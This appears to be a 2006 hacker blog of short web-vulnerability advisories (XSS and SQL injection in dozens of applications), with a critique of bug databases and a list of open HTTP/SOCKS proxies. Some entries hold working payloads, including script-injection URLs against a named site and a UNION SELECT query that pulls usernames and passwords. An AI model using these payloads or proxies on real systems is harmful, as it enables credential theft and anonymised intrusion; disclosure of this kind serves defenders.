SiteForge Collaborative Development Platform contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "_status","_extra1","_extra2","_extra3" paramters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_status=%3Cscript%3Ealer
t('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action
/proj.siteforge?proj=siteforge&_extra1=%3Cscript%3Ealert(
'r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=%3Cscript%3
Ealert('r0t')%3C/script%3E

http://www.sitelliteforge.com/index/siteforge-bugs-action/
proj.siteforge?proj=siteforge&_extra1=&_extra3=&_extra2=%3
Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Virtual War multiple SQL inj. vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.vwar.de/
affected versions:v1.5.0 R14 and prior
###############################################

Vuln. Description:

Virtual War contains a flaw that allows a remote sql injection attacks.Input passed to the "s","showgame","sortorder","sortby" parameters in "war.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

openCI SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.openci.info/
affected versions: v.1.0 BETA 0.20.1 and prior
###############################################

Vuln. Description:

openCI contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Upgrade to v.1.0 BETA 0.30.0
###############################################
More information @ unsecured-systems.com/forum/

SSPwiz XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.sspwiz.com/
affected versions:SSPwiz Plus 1.0.7 and prior
###############################################

Vuln. Description:

SSPwiz contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "message" parameter in "index.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

iPostMX 2005 vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.ipostmx.com/
affected versions:2.0 and prior
###############################################

Vuln. Description:


iPostMX 2005 contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "RETURNURL" parameter in "userlogin.cfm" and "account.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentForum II XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentforum.cfm
affected versions:aXentForum II and prior
###############################################

Vuln. Description:

aXentForum II contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

aXentGuestbook I.I XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://www.axent.us/axentguestbook.cfm
affected versions:aXentGuestbook I.I and prior
###############################################

Vuln. Description:

aXentGuestbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "startrow" parameter in "guestbook.cfm" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

LivingDot Photos XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 15 june 2006
vendor:http://photoblog.livingdot.com/
affected versions:latest and prior
###############################################

Vuln. Description:

LivingDot Photos contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "comment.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, June 13, 2006

EvGenius Counter XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 13 june 2006
vendor:http://counter.evgenius.net/
affected versions:3.4 and prior
###############################################

Vuln. Description:

EvGenius Counter contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "monthly.php" and "daily.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, June 10, 2006

DwZone Shopping Cart XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://www.dwzone.it/Extension/ShoppingCart/default.asp
affected versions:1.1.9 and prior
###############################################

Vuln. Description:

DwZone Shopping Cart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ToCategory" and "FromCategory" parameter in "ProductDetailsForm.asp" and input passed to the "UserName" and "Password" parameter in "LogIn/VerifyUserLog.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Xtreme ASP Photo Gallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:http://pensacolawebdesigns.com/xtremeasp/default.asp
affected versions:1.05 and prior
###############################################

Vuln. Description:

Xtreme ASP Photo Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catname" and "total" parameter in "displaypic.asp" and input passed to the "catname" parameter in "displaythumbs.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Uphotogallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 june 2006
vendor:www.uapplication.com/uphotogallery/index.asp
affected versions:1.1 and prior
###############################################

Vuln. Description:

Uphotogallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "s" and "Block" parameter in "thumbnails.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, June 09, 2006

ePhotos vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://enthrallweb.com/detail.asp?ProductID=13
affected versions:2.2 and prior
###############################################

Vuln. Description:

ePhotos contains a flaw that allows a remote sql injection attacks.Input passed to the "CAT_ID" parameter in "subphotos.asp",subLevel2.asp and Input passed to the "AL_ID" parameter in "photo.asp" and Input passed to the "SUB_ID" parameter in "subLevel2.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

i-Gallery XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.b-cp.com/igallery/
affected versions:i-Gallery 4.1 PLUS and prior
###############################################

Vuln. Description:

i-Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "n" and "d" parameter in "login.asp" and input passed to the "d" parameter in "igallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

bugtraqs @ all

Hi guys , as in last 6mothes i had reported about some bugs in webaplications, i think that i can tell something about bugtraqs at all.
Some critic of course..

Lets start with secunia.com
Security research company wich is orginally located in Denmark , those guys do alot of job , they do alot in they personal research..they try to verifyall reported vulns, ok sometimes they verification isnt so sucefull as some attacker exploitation of bug, but dont forget that they try to verify all , so thats point bring them to best form all.


As next one i wanna view osvdb.org
Open source vuln. database - thats says something. Great guys they verify all stuff , thats why they come out later than others.
They was my favorites , but in my eyes thy lose favorite place , when they started to use words "Exploit is Rumored" by examples.
In that point if i give example like http://victim/vuln_app/index.php?cat=[XSS]
Thats one isnt a exploit , did i any time published as exploit?
Its example for those who like or must to verify.
So, thats why it "was" my favorite.


So one of most popular for years is securityfocus.com

They are good enough, i never send them one of my reports.. oh..yes once it was as bugtraq for some site apliction , yahoo or other one.
I was laughing , when i saw credits like discovered by "rakstija r0t3d3vil" ... "rakstija"- is latvian word - wrote .
In start of my repport is always wroten wich guy had discovered that, but thats only mean that guys ned better glases as i have.
Why i didnt report to them?
Simple answer - where to report?
If i cant find with 2 clicks i dont have any interess more to report them.

Next one will be frsirt.com

Nice guys , but they dont verify by them selfs , but wait for secunia guys.
I think thats tell everything.

next one is security.nnov.ru

Nice russian guys, they are more buglist as bugtraq , cauz they dont verify anything .
But good point of them , they are fastest updated "bugtraq" on earth.

and nvd.nist.gov

National vulnerability database, thats says nothin..but domain wich ends with ".gov" say alone something. They risk rate isnt better as by SANS.I dont think that they have alot of reports from guys who discover vulns. , but they are good with collecting them even they are from .gov


and ofcourse xforce.iss.net

I will say its black horse in that chalange.
I never send them report of my work , but they are always know everything.
Maybe they are located as outhsider in by da best ones, but they do good job.


yes and milw0rm.com

str0ke do a good job at all, site is specific cauz mostly is based on exploits and reports are mostly only with exploits, thats not bad at all.

yes and the popular russian source securitylab.ru

They dont verify and remove links to orinal advisory , thats point why i dont like to report to them .. But thats not only them , mostly all russian security resources remove advisory authors and orginaly sources... but in thats i n best way , sometimes they like to give credits to them selfs.. So the worth security or bugtraq scene in world is russian.
Other one russian wich i know is hackzona.ru, they only translate random advisories from secunia and thats all , and there isnt point like "when" or "who"... who cares?
other one is xakep.ru - they have own sucessful jurnal and other things for n00bs.
most of butraq'ed things they published as own.


secwatch.org ....

They collect infos from bigest bugtraqs and have they own bugtraq list wich isnt also verified.

netsecurity.com

copy/paste - thats say evrything.


hackerscenter.com

Not a bugtraq, but portal wich have bugtraq , of course they dont verify , but its more better than russian of point cauz they dont forget about that guys wich discovered that stuff wich they published.


So i think i had wrote about most popular bugtraqs , if i missed some , than sorry ...

ClickGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:5.0 and prior
###############################################


ClickGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "gallery_id" parameter in "gallery.asp" and input passed to the "parentcurrentpage" parameter in "view_gallery.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsCMS <=v4.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v4.5 and prior
###############################################

Vuln. Description:

fipsCMS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to multiple parameters "w","phcat","dayid","calw" in "index.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

fipsGallery vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:fipsASP
affected versions:v1.5 and prior
###############################################


Vuln. Description:

fipsGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "path" parameter in "zoom.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Clickcart 6.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:ClickTech
affected versions:6.0 and prior
###############################################

Vuln. Description:

Clickcart contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

WS-Album XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:PlaneteAfrique
affected versions:1.1 and prior
###############################################

Vuln. Description:

WS-Album contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "image" and "PublisedDate" parameter in "FullPhoto.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EZGallery <= v1.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:www.htmljunction.net/ezgallery/
affected versions:v1.5 and prior
###############################################

Vuln. Description:


EZGallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the multiple parameters (pUserID,aid,aname,uid,m) in "common/galleries.asp" and Input passed to the multiple parameters (aid,aname,uid,m,gp,g) in "common/pupload.asp" and Input passed to the "msg","fn","gp" parameters in "common/upload.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

My Photo Scrapbook vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:
www.esoftwaresite.com/aspscripts/scrapbook/marketing/main.htm
affected versions: 1.0 and prior
###############################################

Vuln. Description:

1.
My Photo Scrapbook contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "key_m" parameter in "display.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
Input passed to the "key" parameter in "Displayview.asp" and "Details_Photo_bv.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ASP ListPics <=4.3 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.iisworks.com/listpics/
affected versions: 4.3 and prior
###############################################

Vuln. Description:

ASP ListPics contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "Info" parameter in "listpics.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:

/listpics.asp?a=rate&ID=1&Info=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

KAPhotoservice <=7.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.kaphotoservice.com/
affected versions: 7.5 and prior
###############################################


Vuln. Description:


1. Script Insertion attack vuln.

KAPhotoservice contains a flaw that allows a remote script insertion attacks.Input supplied to the "New Category" parameter in "edtalbum.asp" isn't properly sanitised before being used. This can be exploited to insert arbitrary script code, which will be executed in a user's browser session in context of an affected site when malicious data is viewed.



2. Cross-Site Scripting attack vuln.

KAPhotoservice contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat","albumid" parameter in "album.asp" and input passed to the "apage" parameter in "edtalbum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

/album.asp?cat=[XSS]&albumid=1
/albums.asp?cat=&albumid=[XSS]
/edtalbum.asp?cat=&albumid=1&apage=[XSS]



note for developer:
my checking results you become via report module at your software,but its only those where is possible SQL injection.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

VanillaSoft Helpdesk XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.vanillasoft.ch/en/
affected versions:Version 2005 and prior
###############################################

Vuln. Description:

VanillaSoft Helpdesk contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "username" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OfficeFlow <=2.6 vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 june 2006
vendor:http://www.asptools.biz/officeflow.asp
affected versions:2.6 and prior
###############################################

Vuln. Description:


1. Cross-Site Scripting attack vuln.

OfficeFlow contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sqlType" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


2. SQL injection attack vuln.

OfficeFlow contains a flaw that allows a remote sql injection attacks.Input passed to the "Project" parameter in "files.asp" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, June 07, 2006

about general

I decided that blog isnt best place to continue publishing proxies&socks , cauz its take too much place in your view.
Proxies&socks start yesterday are published on our board .
I will try to contribute daily ,but how long i dont know .

OK.
Other point that i second time heard that i am in some other places one was Security Castle and other one some turkish hackers board .
I dont know who are those persons , but thats not me .. me you can meet only here or on our board .

About Crew ,
cembo will make SQL&XSS tool, that will help lazy guys to discover vulns.
And PMB new realese also will come soon .
As i already told FrozenEye, i will write a simple tut how to discover SQL/XSS vulns on webaplications and other nianses in that case. My tut will not open new america its already said/wroten by many people, it will be just from other view or my view.
We are working also for other stuff , when we come closer to complete results ...than you will know more.
Hm... i said almost all what i wanted to say, just... i dont like situation wich we have on board ... its about mods. I already now discuz with some people about that.. have some candidates ,but im not sure and they arent sure that we can work together , so its actual that we need mods, so if you think you are right person or you wanna be that person , go to our board and speak with guys or with me.

Tuesday, June 06, 2006

OBM Multiple SQL inj. and XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://obm.aliacom.fr/
affected versions:
tested on 1.0.3pl1 version.
other versions also can be affected.
###############################################


Vuln. Description:


1. Multiple SQL injection vuln.

OBM contains a flaw that allows a remote sql injection attacks.Input passed to the "new_order" and "order_dir" parameter in
"group/group_index.php","user/user_index.php",
"list/list_index.php","company/company_index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



2.Multiple Cross-Site Scripting attack vuln.

OBM contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tf_lang","tf_name","tf_user","tf_lastname",
"tf_contact","tf_datebefore","tf_dateafter" parameter in certain files isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Some examples:

http://obm-host/publication/publication_index.php?
tf_title=&sel_type=_ALL_&tf_year=&tf_lang=[XSS]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=[XSS]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=[XSS]

http://obm-host/user/user_index.php?action=search
&tf_login=&tf_lastname=[XSS]

http://obm-host/list/list_index.php?action=search
&tf_name=[XSS]

http://obm-host/list/list_index.php?action=search
&tf_name=&tf_contact=[XSS]


http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=&page=&new_order=[SQL]

http://obm-host/group/group_index.php?action=sear
ch&tf_name=&tf_user=&page=&new_order=group_email
&order_dir=[SQL]

http://obm-host/?action=search&tf_login=&tf_last
name=&sel_perms=&tf_email=&tf_desc=&tf_group=&cb
_archive=&page=&new_order=[SQL]

http://obm-host/user/user_index.php?action=searc
h&tf_login=&tf_lastname=&sel_perms=&tf_email=&tf
_desc=&tf_group=&cb_archive=&page=&new_order=use
robm_lastname&order_dir=[SQL]

http://obm-host/list/list_index.php?action=sear
ch&tf_name=&tf_contact=&sel_market=&page=&new_o
rder=list_subject&order_dir=[SQL]

http://obm-host/list/list_index.php?action=searc
h&tf_name=&tf_contact=&sel_market=&page=&new_or
der=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=[XSS]


http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=company_vat&order_dir=DESC&entity=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=company_vat&order_dir=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=&tf_datebefore=&page=&new_or
der=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=[SQL]

http://obm-host/company/company_index.php?action
=search&tf_name=&tf_phone=&sel_kind=&sel_cat=&tf
_cat_code=&cb_cat_tree=&sel_act=&sel_naf=&tf_zip
=&cb_archive=&sel_market=&tf_town=&sel_ctry=&sel
_dsrc=&tf_dateafter=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

KnowledgeTree Open Source XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:www.ktdms.com/products/knowledgetree
affected versions:3.0.3 and prior
###############################################

Vuln. Description:

KnowledgeTree contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "fDocumentId" parameter in "view.php" and input passed to the "fSearchableText" parameter in "/search/simpleSearch.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Also attacker will get full installisations path with error message while testing "fDocumentId" parameter in "view.php".


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SquirrelMail <=1.5.1 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://www.squirrelmail.org/
affected versions:
1.4.6-20060409 latest stable
1.4.7[CVS]
1.5.1-20060409 Development Version
and prior versions also can be affected
###############################################

Vuln. Description:

SquirrelMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "mailbox" parameter in "search.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 05, 2006

LabWiki XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.bioinformatics.org/phplabware/labwiki/
affected versions:1.0 and prior
###############################################

Vuln. Description:

LabWiki contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "help" parameter in "recentchanges.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Wiki SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlewiki/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Particle Wiki contains a flaw that allows a remote sql injection attacks.Input passed to the "version" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC:

# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,password%20from%20pwiki_users%20/*

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Gallery SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlegallery/
affected versions:1.0.0 and prior
###############################################

Vuln. Description:

Particle Gallery contains a flaw that allows a remote sql injection attacks.Input passed to the "imageid" parameter in "viewimage.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Vendor patch:
Update to 1.0.1
or
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, June 02, 2006

Socks&Proxies 4 today

As always all proxies are without logging* feature:) and proxys are https, but socks 4/5. Thanks to ~d4rk*byt3~

HTTP: 201.252.14.226:27619
Sock: 201.252.14.226:20515
RUSSIAN FEDERATION, MOSCOW, MOSKVA

HTTP: 83.28.24.131:35214
Sock: 83.28.24.131:38183
POLAND, RZESZOW, PODKARPACKIE

HTTP: 62.241.67.38:35812
Sock: 62.241.67.38:19970
FRANCE, -, -

HTTP: 63.246.180.69:37319
Sock: 63.246.180.69:12669
UNITED STATES, AUSTIN, TEXAS

HTTP: 83.9.46.126:18743
Sock: 83.9.46.126:10652
POLAND, -, -

HTTP: 83.29.204.146:36558
Sock: 83.29.204.146:42082
POLAND, LUBLIN, LUBELSKIE

HTTP: 219.171.8.217:14342
Sock: 219.171.8.217:37433
JAPAN, TOKYO, TOKYO

HTTP: 81.213.163.221:9130
Sock: 81.213.163.221:54257
TURKEY, -, -

HTTP: 213.22.210.170:39181
Sock: 213.22.210.170:33345
PORTUGAL, -, -

HTTP: 80.53.47.210:54306
Sock: 80.53.47.210:25106
POLAND, -, -

HTTP: 62.89.114.165:54158
Sock: 62.89.114.165:27006
POLAND, KATOWICE, SLASKIE

HTTP: 205.200.61.47:59863
Sock: 205.200.61.47:59961
CANADA, WINNIPEG, MANITOBA

HTTP: 193.77.242.174:12531
Sock: 193.77.242.174:34704
SLOVENIA, LJUBLJANA, LJUBLJANA

HTTP: 84.54.138.10:5664
Sock: 84.54.138.10:15322
BULGARIA, -, -

HTTP: 213.65.241.156:55487
Sock: 213.65.241.156:53241
SWEDEN, ALINGSåS, VASTRA GOTALAND

HTTP: 83.38.36.165:60205
Sock: 83.38.36.165:58491
SPAIN, ALICANTE, VALENCIA

HTTP: 66.146.215.193:52026
Sock: 66.146.215.193:34666
UNITED STATES, CHICAGO, ILLINOIS

HTTP: 68.252.234.238:61976
Sock: 68.252.234.238:11072
UNITED STATES, CHICAGO, ILLINOIS

HTTP: 81.27.200.203:43581
Sock: 81.27.200.203:48051
CZECH REPUBLIC, BRNO, JIHOMORAVSKY KRAJ

HTTP: 89.138.83.139:34467
Sock: 89.138.83.139:56029
KENYA, KISUMU, NYANZA

HTTP: 218.152.155.233:27693
Sock: 218.152.155.233:25030
KOREA, REPUBLIC OF, -, -

HTTP: 82.42.186.109:59724
Sock: 82.42.186.109:4957
UNITED KINGDOM, EDINBURGH, SCOTLAND

HTTP: 84.237.193.203:44038
Sock: 84.237.193.203:64922
LATVIA, -, -

HTTP: 200.8.23.29:9820
Sock: 200.8.23.29:22932
VENEZUELA, VALENCIA, CARABOBO

HTTP: 69.157.138.107:49012
Sock: 69.157.138.107:60825
CANADA, QUEBEC, QUEBEC

HTTP: 85.84.16.251:46895
Sock: 85.84.16.251:31387
SPAIN, BILBAO, PAIS VASCO

HTTP: 70.241.68.250:19938
Sock: 70.241.68.250:51197
UNITED STATES, HOUSTON, TEXAS

HTTP: 82.236.182.179:27736
Sock: 82.236.182.179:6400
FRANCE, -, -

HTTP: 24.14.158.122:56762
Sock: 24.14.158.122:40178
UNITED STATES, OAK PARK, ILLINOIS

HTTP: 221.140.240.183:59148
Sock: 221.140.240.183:35512
KOREA, REPUBLIC OF, -, -

HTTP: 201.145.213.196:8862
Sock: 201.145.213.196:60506
MEXICO, -, -

HTTP: 210.1.96.92:45676
Sock: 210.1.96.92:31813
PHILIPPINES, MANILA, MANILA

HTTP: 71.136.41.203:35541
Sock: 71.136.41.203:53675
UNITED STATES, SAN DIEGO, CALIFORNIA

HTTP: 219.254.44.29:10627
Sock: 219.254.44.29:33141
KOREA, REPUBLIC OF, SEOUL, KYONGGI-DO

HTTP: 213.13.198.239:10790
Sock: 213.13.198.239:47686
PORTUGAL, MATOSINHOS, PORTO

HTTP: 201.78.63.185:33753
Sock: 201.78.63.185:26856
BRAZIL, -, -

HTTP: 190.55.14.55:50667
Sock: 190.55.14.55:58244
ARGENTINA, RAMOS MEJIA, BUENOS AIRES

